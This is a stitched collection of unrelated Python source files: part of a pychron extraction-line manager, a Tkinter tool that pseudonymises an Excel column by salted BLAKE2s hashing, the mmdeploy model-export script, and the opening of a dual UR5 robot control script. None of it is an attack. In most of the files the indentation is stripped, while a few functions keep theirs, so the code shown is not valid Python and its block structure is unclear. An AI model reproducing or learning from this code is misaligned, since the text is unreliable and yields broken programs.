self.console_display.add_text(msg, color=color)
# ===============================================================================
# defaults
# ===============================================================================
def _manometer_manager_default(self):
from pychron.extraction_line.manometer_manager import ManometerManager
return ManometerManager(application=self.application)
def _cryo_manager_default(self):
from pychron.extraction_line.cryo_manager import CryoManager
return CryoManager(application=self.application)
def _gauge_manager_default(self):
from pychron.extraction_line.gauge_manager import GaugeManager
return GaugeManager(application=self.application)
def _switch_manager_factory(self):
klass = self._get_switch_manager_klass()
vm = klass(application=self.application)
vm.on_trait_change(self._handle_state, 'refresh_state')
vm.on_trait_change(self._handle_lock_state, 'refresh_lock_state')
vm.on_trait_change(self._handle_owned_state, 'refresh_owned_state')
vm.on_trait_change(self._handle_refresh_canvas, 'refresh_canvas_needed')
vm.on_trait_change(self._handle_console_message, 'console_message')
bind_preference(vm, 'valves_path', 'pychron.extraction_line.valves_path')
return vm
def _get_switch_manager_klass(self):
from pychron.extraction_line.switch_manager import SwitchManager
return SwitchManager
def _explanation_default(self):
e = ExtractionLineExplanation()
if self.switch_manager is not None:
e.load(self.switch_manager.switches)
self.switch_manager.on_trait_change(e.refresh, 'refresh_explanation')
return e
def _canvas_default(self):
return self.new_canvas()
def _network_default(self):
return ExtractionLineGraph()
if __name__ == '__main__':
elm = ExtractionLineManager()
elm.bootstrap()
elm.canvas.style = '2D'
elm.configure_traits()
# =================== EOF ================================
|
PseudoDialogOptionsGrid.py | from tkinter import ttk
import tkinter as tk
import tkinter.filedialog as fd
import pandas as pd
import threading
import hashlib
import os
import pandas.io.formats.excel
import logging
from logging.handlers import RotatingFileHandler
import pem
import gc
import sys
pandas.io.formats.excel.header_style = None
class App(tk.Tk):
def __init__(self):
super().__init__()
self.resizable(False, False)
self.geometry("500x320")
self.title("Simple Pseudonymiser")
self.welcomeLabel = tk.Label(self, text="Welcome to the Simple Pseudonymiser")
self.welcomeLabel.pack(padx=60, pady=10)
self.logger = logging.getLogger()
handler = RotatingFileHandler("pseudo_log.log", maxBytes=10 * 1024 * 1024, backupCount=5)
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(logging.DEBUG)
style = ttk.Style()
style.configure("foreGreen.Label", foreground="green")
style.configure("foreRed.Label", foreground="red")
style.configure("foreOrange.Label", foreground="coral4")
style.configure("button.flat", relief="flat")
self._fileName = tk.StringVar()
self._result = tk.StringVar()
self._salt = tk.StringVar()
self._saltOutput = tk.StringVar()
self._pseudoOutput = tk.StringVar()
self._inputFileName = tk.StringVar()
self._resultOutput = tk.StringVar()
self._pseudoOutput.set("Pseudonymise the file")
self.btn_salt = ttk.Button(self, text="Choose a cert/pem file to generate your salt",
command=self.choose_pem_file, width=100)
self.btn_salt.pack(padx=60, pady=10)
self.btn_file = ttk.Button(self, text="Choose excel file and the select column to pseudo",
command=self.choose_file, state="disabled", width=100)
self.btn_file.pack(padx=60, pady=10)
self.menu_label_text = tk.StringVar()
self.menu_label_text.set("Choose the excel column that you would like to have pseudonymised")
self.menu_label = tk.Label(self, textvariable=self.menu_label_text)
self.options = ['']
self.om_variable = tk.StringVar(self)
self.om = ttk.OptionMenu(self, self.om_variable, *self.options)
self.om.configure(width=60)
self.alwaysActiveStyle(self.om)
self.om['state'] = 'disabled'
self.om_variable.trace("w", self.option_menu_selection_event)
self.btn_pseudo = ttk.Button(self, textvariable=self._pseudoOutput,
command=self.pseudonymize_file, state="disabled", width=100)
self.resultLabel = ttk.Label(self, textvariable=self._resultOutput,
width=400, wraplength=390, font=('Helvetica', 9, 'bold'))
self.resultLabel.configure(style="foreGreen.Label", anchor="center")
self.processing_bar = ttk.Progressbar(self, orient='horizontal', mode='determinate', length=400)
def report_callback_exception(self, exc, val, tb):
    """Tk callback-exception hook: log the error, destroy any half-built
    (unmapped) windows, and re-show the pseudonymise button.

    NOTE(review): the trailing ``btn_pseudo.pack`` runs on every callback
    error — presumably to restore the UI after a failure; confirm.
    """
    exc_type, exc_value, exc_traceback = sys.exc_info()
    self.logger.error('exception line: ' + str(exc_traceback.tb_lineno) + ' error: ' + str(exc_value))
    self.destroy_unmapped_children(self)
    self.btn_pseudo.pack(padx=60, pady=10)
def alwaysActiveStyle(self, widget):
widget.config(state="active")
widget.bind("<Leave>", lambda e: "break")
def show_pickers(self):
self.menu_label.pack(padx=60, pady=0)
self.om.pack(padx=60, pady=10)
self.alwaysActiveStyle(self.om)
self.btn_pseudo.pack(padx=60, pady=10)
def hide_pickers(self):
self.menu_label.pack_forget()
self.om.pack_forget()
self.btn_pseudo.pack_forget()
def destroy_unmapped_children(self, parent):
    """
    Destroys unmapped windows (empty gray ones which got an error during
    initialization) recursively from bottom (root window) to top (last
    opened window).
    """
    # iterate over a copy: destroying a child mutates parent.children
    children = parent.children.copy()
    for index, child in children.items():
        if not child.winfo_ismapped():
            parent.children.pop(index).destroy()
        else:
            self.destroy_unmapped_children(child)
def choose_salt_file(self):
self.btn_file['state'] = 'disabled'
self._salt.set("")
file_types = (("Text File", "*.txt"),)
filepath = fd.askopenfilename(title="Open PEM file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
self._salt.set(filepath)
with open(self._salt.get()) as f:
self._salt.set(f.readline())
self._saltOutput.set("Your salt term is " + self._salt.get()[4:].rjust(len(self._salt.get()), "*"))
self.btn_file['state'] = 'normal'
self.logger.info('Salt Loaded')
def choose_pem_file(self):
if self.resultLabel.winfo_ismapped():
self.resultLabel.pack_forget()
self.btn_file['state'] = 'disabled'
self._salt.set("")
file_types = (("crt file", "*.crt"), ("cert file", "*.cert"), ("pem file", "*.pem"))
filepath = fd.askopenfilename(title="Open pem or cert file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
certs = pem.parse_file(filepath)
self._salt.set(filepath)
self._salt.set(certs[0].sha1_hexdigest)
self._saltOutput.set("Your salt term is " + self._salt.get()[4:].rjust(len(self._salt.get()), "*"))
self.btn_file['state'] = 'normal'
self.logger.info('Salt Loaded')
def choose_file(self):
    """Ask the user for an .xlsx file, read only its header row and
    populate the column picker with normalised column names."""
    if self.resultLabel.winfo_ismapped():
        self.resultLabel.pack_forget()
    self.btn_pseudo['state'] = 'disabled'
    self._fileName.set("")
    file_types = (("xlsx", "*.xlsx"),)
    filepath = fd.askopenfilename(title="Open file", filetypes=file_types)
    exists = os.path.isfile(filepath)
    self.hide_pickers()
    if exists:
        # lock the buttons while the header row is read
        self.btn_salt['state'] = 'disabled'
        self.btn_file['state'] = 'disabled'
        self._fileName.set(filepath)
        self._inputFileName.set(os.path.basename(self._fileName.get()))
        self.btn_pseudo['state'] = 'normal'
        self._resultOutput.set("")
        self.logger.info('Data File Loaded ' + self._fileName.get())
        # NOTE(review): pandas 1.0 removed read_excel's ``encoding``
        # keyword; this call raises TypeError on modern pandas — confirm
        # the pinned pandas version.
        first_row = pd.read_excel(self._fileName.get(), dtype='str', encoding='utf-8', nrows=1)
        # normalise headers: strip, lowercase, spaces -> underscores, drop parens
        first_row.columns = first_row.columns.str.strip().str.lower().str.replace(' ', '_').str.replace('(',
                                                                                                        '').str.replace(
            ')', '')
        self.options = list(first_row)
        self.update_option_menu()
        self.om['state'] = 'normal'
        self.om_variable.set(self.options[0])
        self._pseudoOutput.set("Pseudonymise the column " + self.om_variable.get())
        self.show_pickers()
        self.btn_salt['state'] = 'normal'
        self.btn_file['state'] = 'normal'
        # drop the header frame promptly; files may be large
        del first_row
        gc.collect()
def update_option_menu(self):
menu = self.om["menu"]
menu.delete(0, "end")
for string in self.options:
menu.add_command(label=string,
command=lambda value=string: self.om_variable.set(value))
def option_menu_selection_event(self, *args):
self._pseudoOutput.set("Pseudonymise the column " + self.om_variable.get())
pass
def pseudo(self, x):
    """Return the BLAKE2s hex digest of ``str(x)`` concatenated with the
    current salt term."""
    salted = '{}{}'.format(x, self._salt.get())
    return hashlib.blake2s(salted.encode('utf-8')).hexdigest()
def pseudonymize_file(self):
self.logger.info('Starting Pseudo: ' + self._fileName.get())
self.processing_bar.pack(padx=60, pady=10)
if not self.resultLabel.winfo_ismapped():
self.resultLabel.pack(padx=60, pady=10)
self.processing_bar.start(1000)
t = threading.Thread(target=self.pseudonymize_file_callback)
t.start()
def kill_progress(self):
self.processing_bar.stop()
self.processing_bar.pack_forget()
def get_extension(self, filename):
    """Return *filename*'s extension (including the dot), or None when the
    name has no extension."""
    _, ext = os.path.splitext(filename)
    return ext or None
def get_file_display_name(self, filename):
temp_name = os.path.basename(filename);
return temp_name[:15] + ('..' + self.get_extension(temp_name) if len(temp_name) > 15 else '')
def pseudonymize_file_callback(self):
    """Worker-thread body: load the spreadsheet, hash the selected column
    into a new DIGEST column, drop the original column and write the
    result to ``<name>_psuedo.xlsx``.

    NOTE(review): this runs on a worker thread but calls Tk widget methods
    (``self.update``, label/button config); Tkinter is not thread-safe —
    confirm this is acceptable for this app.
    """
    try:
        self.btn_pseudo['state'] = 'disabled'
        self.btn_file['state'] = 'disabled'
        self.btn_salt['state'] = 'disabled'
        temp_name = self.get_file_display_name(self._fileName.get())
        self.resultLabel.config(style="foreOrange.Label")
        self._resultOutput.set(temp_name + " is being loaded")
        self.update()
        # NOTE(review): pandas 1.0 removed read_excel's ``encoding``
        # keyword — confirm the pinned pandas version.
        df = pd.read_excel(self._fileName.get(), dtype='str', encoding='utf-8')
        # normalise headers the same way choose_file does
        df.columns = df.columns.str.strip().str.lower()\
            .str.replace(' ', '_').str.replace('(', '').str.replace(')', '')
        temp_name = str(self._fileName.get())
        temp_name = temp_name.replace(".xlsx", "_psuedo.xlsx")
        new_name = temp_name
        self.btn_pseudo['state'] = 'disabled'
        self.resultLabel.config(style="foreOrange.Label")
        temp_name = self.get_file_display_name(self._fileName.get())
        self._resultOutput.set(temp_name + " is being pseudonymised")
        self.config(cursor="wait")
        self.update()
        # hash the chosen column, then drop the original values
        df['DIGEST'] = df[self.om_variable.get()].apply(self.pseudo)
        del df[self.om_variable.get()]
        self._result.set(os.path.basename(temp_name))
        if os.path.exists(new_name):
            os.remove(new_name)
        df.to_excel(new_name, index=False)
        # release the frame promptly; input files may be large
        del df
        gc.collect()
        self._resultOutput.set(str(self._fileName.get()) + " has been pseudonymised")
        self.resultLabel.config(style="foreGreen.Label")
        self.btn_pseudo['state'] = 'disabled'
        self.btn_file['state'] = 'normal'
        self.btn_salt['state'] = 'normal'
        self.config(cursor="")
        self.logger.info('Completing Pseudo: ' + self._fileName.get())
        self.kill_progress()
        self.hide_pickers()
    except BaseException as error:
        # broad catch is deliberate: any failure must restore the UI
        exc_type, exc_value, exc_traceback = sys.exc_info()
        self.resultLabel.config(style="foreRed.Label")
        self._resultOutput.set('An exception occurred: details in log file')
        self.btn_pseudo['state'] = 'normal'
        self.btn_file['state'] = 'normal'
        self.btn_salt['state'] = 'normal'
        self.logger.error('An exception occurred: {}'.format(error))
        self.logger.error('exception line: ' + str(exc_traceback.tb_lineno) + ' error: ' + str(exc_value))
        self.kill_progress()
        self.hide_pickers()
if __name__ == "__main__":
app = App()
app.mainloop()
|
deploy.py | # Copyright (c) OpenMMLab. All rights reserved.
import argparse
import logging
import os.path as osp
from functools import partial
import mmcv
import torch.multiprocessing as mp
from torch.multiprocessing import Process, set_start_method
from mmdeploy.apis import (create_calib_table, extract_model,
get_predefined_partition_cfg, torch2onnx,
torch2torchscript, visualize_model)
from mmdeploy.utils import (IR, Backend, get_backend, get_calib_filename,
get_ir_config, get_model_inputs,
get_partition_config, get_root_logger, load_config,
target_wrapper)
from mmdeploy.utils.export_info import dump_info
def parse_args():
    """Parse command-line arguments for the model-deployment entry point."""
    parser = argparse.ArgumentParser(description='Export model to backends.')
    parser.add_argument('deploy_cfg', help='deploy config path')
    parser.add_argument('model_cfg', help='model config path')
    parser.add_argument('checkpoint', help='model checkpoint path')
    # fixed duplicated word in the help text ('convert model model')
    parser.add_argument('img', help='image used to convert model')
    parser.add_argument(
        '--test-img', default=None, help='image used to test model')
    parser.add_argument('--work-dir', help='the dir to save logs and models')
    parser.add_argument(
        '--calib-dataset-cfg',
        help='dataset config path used to calibrate in int8 mode. If not \
specified,it will use "val" dataset in model config instead.',
        default=None)
    parser.add_argument(
        '--device', help='device used for conversion', default='cpu')
    parser.add_argument(
        '--log-level',
        help='set log level',
        default='INFO',
        # NOTE: logging._nameToLevel is a private mapping, kept for parity
        # with existing behavior; logging.getLevelNamesMapping() (3.11+)
        # is the public equivalent.
        choices=list(logging._nameToLevel.keys()))
    parser.add_argument(
        '--show', action='store_true', help='Show detection outputs')
    parser.add_argument(
        '--dump-info', action='store_true', help='Output information for SDK')
    args = parser.parse_args()
    return args
def create_process(name, target, args, kwargs, ret_value=None):
    """Run *target* in a spawned subprocess and block until it finishes.

    Args:
        name: human-readable label used in log messages.
        target: callable executed (via ``target_wrapper``) in the child.
        args, kwargs: forwarded to *target*.
        ret_value: optional shared value; a non-zero result after the
            join is treated as failure and terminates this process.
    """
    logger = get_root_logger()
    logger.info(f'{name} start.')
    wrapped = partial(target_wrapper, target, logger.level, ret_value)
    proc = Process(target=wrapped, args=args, kwargs=kwargs)
    proc.start()
    proc.join()
    if ret_value is None:
        return
    if ret_value.value != 0:
        logger.error(f'{name} failed.')
        exit(1)
    logger.info(f'{name} success.')
def torch2ir(ir_type: IR):
    """Return the conversion function from torch to the intermediate
    representation.

    Args:
        ir_type (IR): The type of the intermediate representation.

    Raises:
        KeyError: if *ir_type* is not a supported IR.
    """
    converters = {
        IR.ONNX: torch2onnx,
        IR.TORCHSCRIPT: torch2torchscript,
    }
    func = converters.get(ir_type)
    if func is None:
        raise KeyError(f'Unexpected IR type {ir_type}')
    return func
def main():
args = parse_args()
set_start_method('spawn')
logger = get_root_logger()
logger.setLevel(args.log_level)
deploy_cfg_path = args.deploy_cfg
model_cfg_path = args.model_cfg
checkpoint_path = args.checkpoint
# load deploy_cfg
deploy_cfg, model_cfg = load_config(deploy_cfg_path, model_cfg_path)
# create work_dir if not
mmcv.mkdir_or_exist(osp.abspath(args.work_dir))
if args.dump_info:
dump_info(deploy_cfg, model_cfg, args.work_dir, pth=checkpoint_path)
ret_value = mp.Value('d', 0, lock=False)
# convert to IR
ir_config = get_ir_config(deploy_cfg)
ir_save_file = ir_config['save_file']
ir_type = IR.get(ir_config['type'])
create_process(
f'torch2{ir_type.value}',
target=torch2ir(ir_type),
args=(args.img, args.work_dir, ir_save_file, deploy_cfg_path,
model_cfg_path, checkpoint_path),
kwargs=dict(device=args.device),
ret_value=ret_value)
# convert backend
ir_files = [osp.join(args.work_dir, ir_save_file)]
# partition model
partition_cfgs = get_partition_config(deploy_cfg)
if partition_cfgs is not None:
if 'partition_cfg' in partition_cfgs:
partition_cfgs = partition_cfgs.get('partition_cfg', None)
else:
assert 'type' in partition_cfgs
partition_cfgs = get_predefined_partition_cfg(
deploy_cfg, partition_cfgs['type'])
origin_ir_file = ir_files[0]
ir_files = []
for partition_cfg in partition_cfgs:
save_file = partition_cfg['save_file']
save_path = osp.join(args.work_dir, save_file)
start = partition_cfg['start']
end = partition_cfg['end']
dynamic_axes = partition_cfg.get('dynamic_axes', None)
create_process(
f'partition model {save_file} with start: {start}, end: {end}',
extract_model,
args=(origin_ir_file, start, end),
kwargs=dict(dynamic_axes=dynamic_axes, save_file=save_path),
ret_value=ret_value)
ir_files.append(save_path)
# calib data
calib_filename = get_calib_filename(deploy_cfg)
if calib_filename is not None:
calib_path = osp.join(args.work_dir, calib_filename)
create_process(
'calibration',
create_calib_table,
args=(calib_path, deploy_cfg_path, model_cfg_path,
checkpoint_path),
kwargs=dict(
dataset_cfg=args.calib_dataset_cfg,
dataset_type='val',
device=args.device),
ret_value=ret_value)
backend_files = ir_files
# convert backend
backend = get_backend(deploy_cfg)
if backend == Backend.TENSORRT:
model_params = get_model_inputs(deploy_cfg)
assert len(model_params) == len(ir_files)
from mmdeploy.apis.tensorrt import is_available as trt_is_available
from mmdeploy.apis.tensorrt import onnx2tensorrt
assert trt_is_available(
), 'TensorRT is not available,' \
+ ' please install TensorRT and build TensorRT custom ops first.'
backend_files = []
for model_id, model_param, onnx_path in zip(
range(len(ir_files)), model_params, ir_files):
onnx_name = osp.splitext(osp.split(onnx_path)[1])[0]
save_file = model_param.get('save_file', onnx_name + '.engine')
partition_type = 'end2end' if partition_cfgs is None \
else onnx_name
create_process(
f'onnx2tensorrt of {onnx_path}',
target=onnx2tensorrt,
args=(args.work_dir, save_file, model_id, deploy_cfg_path,
onnx_path),
kwargs=dict(device=args.device, partition_type=partition_type),
ret_value=ret_value)
backend_files.append(osp.join(args.work_dir, save_file))
elif backend == Backend.NCNN:
from mmdeploy.apis.ncnn import is_available as is_available_ncnn
if not is_available_ncnn():
logger.error('ncnn support is not available.')
exit(1)
from mmdeploy.apis.ncnn import get_output_model_file, onnx2ncnn
backend_files = []
for onnx_path in ir_files:
model_param_path, model_bin_path = get_output_model_file(
onnx_path, args.work_dir)
create_process(
f'onnx2ncnn with {onnx_path}',
target=onnx2ncnn,
args=(onnx_path, model_param_path, model_bin_path),
kwargs=dict(),
ret_value=ret_value)
backend_files += [model_param_path, model_bin_path]
elif backend == Backend.OPENVINO:
from mmdeploy.apis.openvino import \
is_available as is_available_openvino
assert is_available_openvino(), \
'OpenVINO is not available, please install OpenVINO first.'
from mmdeploy.apis.openvino import (get_input_info_from_cfg,
get_mo_options_from_cfg,
get_output_model_file,
onnx2openvino)
openvino_files = []
for onnx_path in ir_files:
model_xml_path = get_output_model_file(onnx_path, args.work_dir)
input_info = get_input_info_from_cfg(deploy_cfg)
output_names = get_ir_config(deploy_cfg).output_names
mo_options = get_mo_options_from_cfg(deploy_cfg)
create_process(
f'onnx2openvino with {onnx_path}',
target=onnx2openvino,
args=(input_info, output_names, onnx_path, args.work_dir,
mo_options),
kwargs=dict(),
ret_value=ret_value)
openvino_files.append(model_xml_path)
backend_files = openvino_files
elif backend == Backend.PPLNN:
from mmdeploy.apis.pplnn import is_available as is_available_pplnn
assert is_available_pplnn(), \
'PPLNN is not available, please install PPLNN first.'
from mmdeploy.apis.pplnn import onnx2pplnn
pplnn_files = []
for onnx_path in ir_files:
algo_file = onnx_path.replace('.onnx', '.json')
model_inputs = get_model_inputs(deploy_cfg)
assert 'opt_shape' in model_inputs, 'Expect opt_shape ' \
'in deploy config for PPLNN'
# PPLNN accepts only 1 input shape for optimization,
# may get changed in the future
input_shapes = [model_inputs.opt_shape]
create_process(
f'onnx2pplnn with {onnx_path}',
target=onnx2pplnn,
args=(algo_file, onnx_path),
kwargs=dict(device=args.device, input_shapes=input_shapes),
ret_value=ret_value)
pplnn_files += [onnx_path, algo_file]
backend_files = pplnn_files
if args.test_img is None:
args.test_img = args.img
headless = False
# check headless or not for all platforms.
import tkinter
try:
tkinter.Tk()
except Exception:
headless = True
# for headless installation.
if not headless:
# visualize model of the backend
create_process(
f'visualize {backend.value} model',
target=visualize_model,
args=(model_cfg_path, deploy_cfg_path, backend_files,
args.test_img, args.device),
kwargs=dict(
backend=backend,
output_file=osp.join(args.work_dir,
f'output_{backend.value}.jpg'),
show_result=args.show),
ret_value=ret_value)
# visualize pytorch model
create_process(
'visualize pytorch model',
target=visualize_model,
args=(model_cfg_path, deploy_cfg_path, [checkpoint_path],
args.test_img, args.device),
kwargs=dict(
backend=Backend.PYTORCH,
output_file=osp.join(args.work_dir, 'output_pytorch.jpg'),
show_result=args.show),
ret_value=ret_value)
else:
logger.warning(
'\"visualize_model\" has been skipped may be because it\'s \
running on a headless device.')
logger.info('All process success.')
# Script entry point; `main` is defined earlier in this file.
if __name__ == '__main__':
    main()
|
DualTaskSpaceControl.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Dual Task Space Control
import numpy as np
import argparse
from numpy.linalg import norm
from numpy.linalg import inv
from scipy.io import savemat
import matplotlib.pyplot as plot
import struct
import UR5Class
import socket
import time
import sys
import csv
#import json
import Transformations as tf
import os
import threading
import trajectoryGenerator
import StepGenerator
from numpy.linalg import inv
import rtde.rtde as rtde
import rtde.rtde_config as rtde_config
HOST1 = "192.168.0.99"  # The remote host (first UR5 controller)
HOST2 = "192.168.0.98"  # Second UR5 controller
PORT = 30003            # The same port as used by the server
def getData(comm):
    """Receive one 1060-byte state packet from an already-connected robot socket."""
    return comm.recv(1060)
# getData receives a single 1060-byte data packet from an already-open robot connection
def sendString(comm, string, move_time = 8, pose = False):
    """Send a URScript ``movej`` command built from a 6-element target.

    comm:      connected TCP socket to the robot controller.
    string:    sequence of 6 joint values (or a Cartesian pose when pose=True).
    move_time: motion duration in seconds (URScript ``t`` parameter).
    pose:      when True, prefix the vector with "p" so URScript treats it
               as a pose instead of joint angles.
    """
    joints = ",".join(str(v) for v in string[:6])
    prefix = "p" if pose else ""
    cmd = "movej(" + prefix + "[" + joints + "], t = " + str(move_time) + ")" + "\n"
    comm.send(cmd.encode('ascii'))
    return
def speedJ(comm, string, a = 4*np.pi):
    """Send a URScript ``speedj`` joint-speed command with a 0.1 s horizon.

    comm:   connected TCP socket to the robot controller.
    string: sequence of 6 joint speeds (rad/s).
    a:      joint acceleration limit (rad/s^2).
    """
    vec = "[" + ",".join(str(v) for v in string[:6]) + "]"
    msg = "speedj(" + vec + ", a = " + str(a) + ",t=0.1)" + "\n"
    comm.send(msg.encode('ascii'))
    return
def connect(HOST, PORT):
    """Open a TCP stream to the robot controller with TCP_QUICKACK enabled.

    Returns the connected socket. TCP_QUICKACK (Linux-only) reduces ACK
    latency for the high-rate command stream.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((HOST, PORT))
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
    return sock
def main(args):
    """Dual UR5 task-space control experiment.

    Connects to two UR5 controllers (HOST1/HOST2), reads each robot's initial
    pose, generates mirrored Cartesian trajectories, then streams joint-speed
    commands to both robots over RTDE while logging poses, joint states,
    commanded vs. actual speeds and TCP forces. Finally saves all logs to a
    .mat file and shows error/trajectory plots.

    NOTE(review): `args` (sys.argv) is ignored — argparse re-parses the real
    command line below and rebinds the name `args`. `logging` is used in this
    function but is not imported at the top of this file — verify it is
    available at runtime.
    """
    print ("Starting Program")
    # Robot calibration data (per-robot DH parameter corrections; exact row
    # semantics are defined by UR5Class — TODO confirm there).
    delta_standard_DH = np.mat([[7.80880090239748336e-05, 0.361257734372265993, 0.00128388035686166635, 1.67232993846963135e-05, 2.02354943719599362e-05, 0], \
        [-0.000718642187888640649, 0.00106284384336133905, -0.022893992683020014, -0.00115732902891929612, 0.000201414435319735574, 0], \
        [7.02198637382578372e-05, -395.302340315824551, 396.777096992026259, -1.47374645443299634,0.000169498815833071803, 0.000364725429982712401], \
        [2.91984009971350678e-05, -1.42023254669109278, 1.33410045447338699, 0.0861037286066216462, -3.46593927803766182e-05, -2.71063161709674666e-05]])
    delta_standard_DH_2 = np.mat([[ -5.39038176483263552e-06, 0.200686268169445209, 0.00228952454238523506, 2.04485825460639469e-05, -1.56897709565794351e-05, 0],\
        [ 0.00039024637623907843, 0.000904178045744563359, 0.0145652098260125283, -0.000690055586142879207, 0.000644539557413503772, 0],\
        [ 0.000178790506571227525, 399.392832822527851, -396.49020940525736, -2.90172143203552535, 0.000311791168683808739, 0.000378711630321493242], \
        [ 7.05887359599974621e-05, 1.01499272342048541, -0.906943504886603802, -6.39125177018525026, 2.3011110588447593e-05, 5.9590107063629152e-05]])
    ur5_1 = UR5Class.UR5Class(delta_standard_DH)
    ur5_2 = UR5Class.UR5Class(delta_standard_DH_2)
    # One-shot TCP connections to grab an initial state packet from each robot.
    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s1.connect((HOST1, PORT))
    s1.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2.connect((HOST2, PORT))
    s2.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
    # process = threading.Thread(target=speedJ,args=[HOST,PORT])
    # process.start()
    time.sleep(0.3)
    ur5_1.setRobotData(getData(s1))
    ur5_2.setRobotData(getData(s2))
    s1.close()
    s2.close()
    initialPose1 = ur5_1.getPosition()
    initialPose2 = ur5_2.getPosition()
    #initialPose[3:6] = tf.rotationVector2RollPitchYaw(initialPose[3:6])
    # Print measured vs. forward-kinematics poses as a sanity check, then
    # convert the rotation-vector orientation to roll/pitch/yaw.
    print("InitialPose UR5-1: ", initialPose1)
    print("InitialPose UR5-1 calculated: ", ur5_1.ur5_direct_kinematics(ur5_1.getJointPosition(), vector = True, apply_offset = True))
    initialPose1[3:6] = tf.rotationVector2RollPitchYaw(initialPose1[3:6])
    initialPose1RPY = initialPose1.copy()
    print("Initial Pose UR5-1 RPY", initialPose1RPY)
    print("Initial Pose UR5-1 RPY calculated", ur5_1.ur5_direct_kinematics(ur5_1.getJointPosition(), vector = True, apply_offset = True,rpy=True))
    print("InitialPose UR5-2: ", initialPose2)
    print("InitialPose UR5-2 calculated: ", ur5_2.ur5_direct_kinematics(ur5_2.getJointPosition(), vector = True, apply_offset = True))
    initialPose2[3:6] = tf.rotationVector2RollPitchYaw(initialPose2[3:6])
    initialPose2RPY = initialPose2.copy()
    print("Initial Pose UR5-2 RPY", initialPose2RPY)
    print("Initial Pose UR5-2 RPY calculated", ur5_2.ur5_direct_kinematics(ur5_2.getJointPosition(), vector = True, apply_offset = True,rpy=True))
    # 8 ms step = 125 Hz, matching the RTDE sampling frequency used below.
    freq = 0.008
    trajectoryUR51 = trajectoryGenerator.trajectoryGenerator(initialPose1, step = freq, speed = 0.05, direction = "left")
    trajectoryUR51.generateTrajectory()
    trajectoryUR51.saveDatabase()
    trajectoryUR52 = trajectoryGenerator.trajectoryGenerator(initialPose2, step = freq, speed = 0.05, direction = "right")
    trajectoryUR52.generateTrajectory()
    trajectoryUR52.saveDatabase()
    trajectorySpeedList_1 = []
    trajectorySpeed_1 = []
    trajectorySpeedList_2 = []
    trajectorySpeed_2 = []
    # Cartesian speed references by finite differences of consecutive
    # trajectory samples; the first step gets zero speed.
    for i in range(0,np.shape(trajectoryUR51.database)[0]-1):
        if (i == 0):
            trajectorySpeedList_1.append(np.array([0,0,0,0,0,0]))
        else:
            trajectorySpeedList_1.append((trajectoryUR51.database[i,:] - trajectoryUR51.database[i-1,:])/0.008)
    for i in range(0,np.shape(trajectoryUR52.database)[0]-1):
        if (i == 0):
            trajectorySpeedList_2.append(np.array([0,0,0,0,0,0]))
        else:
            trajectorySpeedList_2.append((trajectoryUR52.database[i,:] - trajectoryUR52.database[i-1,:])/0.008)
    trajectorySpeed_1 = np.asarray(trajectorySpeedList_1, dtype = np.float64)
    trajectorySpeed_2 = np.asarray(trajectorySpeedList_2, dtype = np.float64)
    print('Trajectory 1 number of steps is: ' + str(trajectoryUR51.maxStepNumber -1))
    print('Trajectory 2 number of steps is: ' + str(trajectoryUR52.maxStepNumber -1))
    # NOTE(review): only trajectory 1's length bounds the loop; presumably
    # both trajectories have the same number of steps — confirm.
    countMax = trajectoryUR51.maxStepNumber -1
    input('Aperte Enter pro play')
    # Reconnect to read one more state packet right before the control run.
    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s1.connect((HOST1, PORT))
    s1.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2.connect((HOST2, PORT))
    s2.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
    count = 0
    countAux = 0
    timeList = []
    timeListPerStep = []
    # Pose logs
    poseListUR5_1 = []
    poseSpeedListUR5_1 = []
    # Joint logs
    jointList_1 = []
    speedList_1 = []
    speedCalculatedListUR5_1 = []
    # Force logs
    TCPForceList_UR5_1 = []
    # Pose logs
    poseListUR5_2 = []
    poseSpeedListUR5_2 = []
    # Joint logs
    jointList_2 = []
    speedList_2 = []
    speedCalculatedListUR5_2 = []
    # Force logs
    TCPForceList_UR5_2 = []
    lostTime = 0
    t1 = time.perf_counter()
    timeInit = t1
    timeListRobot_1 = []
    timeListRobot_2 = []
    # Record each robot's own clock origin so logged times are relative.
    ur5_1.setRobotData(getData(s1))
    timeInitRobot_1 = ur5_1.getTime()
    ur5_2.setRobotData(getData(s2))
    timeInitRobot_2 = ur5_2.getTime()
    s1.close()
    s2.close()
    jointControl_1 = np.zeros(6)
    jointControl_2 = np.zeros(6)
    # `auxiliar` gates logging until the robot is actually moving.
    auxiliar = False
    # s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # s1.connect((HOST1, PORT))
    # s1.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
    # s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # s2.connect((HOST1, PORT))
    # s2.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
    # Command-line parameters for the RTDE connection (rebinds `args`).
    parser = argparse.ArgumentParser()
    parser.add_argument('--host', default='192.168.0.99', help='name of host to connect to (localhost)')
    parser.add_argument('--port', type=int, default=30004, help='port number (30004)')
    parser.add_argument('--samples', type=int, default=0, help='number of samples to record')
    parser.add_argument('--frequency', type=int, default=125, help='the sampling frequency in Herz')
    parser.add_argument('--config', default='record_configuration.xml', help='data configuration file to use (record_configuration.xml)')
    parser.add_argument('--output', default='robot_data.csv', help='data output file to write to (robot_data.csv)')
    parser.add_argument("--verbose", help="increase output verbosity", action="store_true")
    args = parser.parse_args()
    if args.verbose:
        logging.basicConfig(level=logging.INFO)
    # RTDE recipes: 'out' = robot state outputs, 'setp' = command registers,
    # 'watchdog' = keep-alive register.
    conf = rtde_config.ConfigFile(args.config)
    output_names, output_types = conf.get_recipe('out')
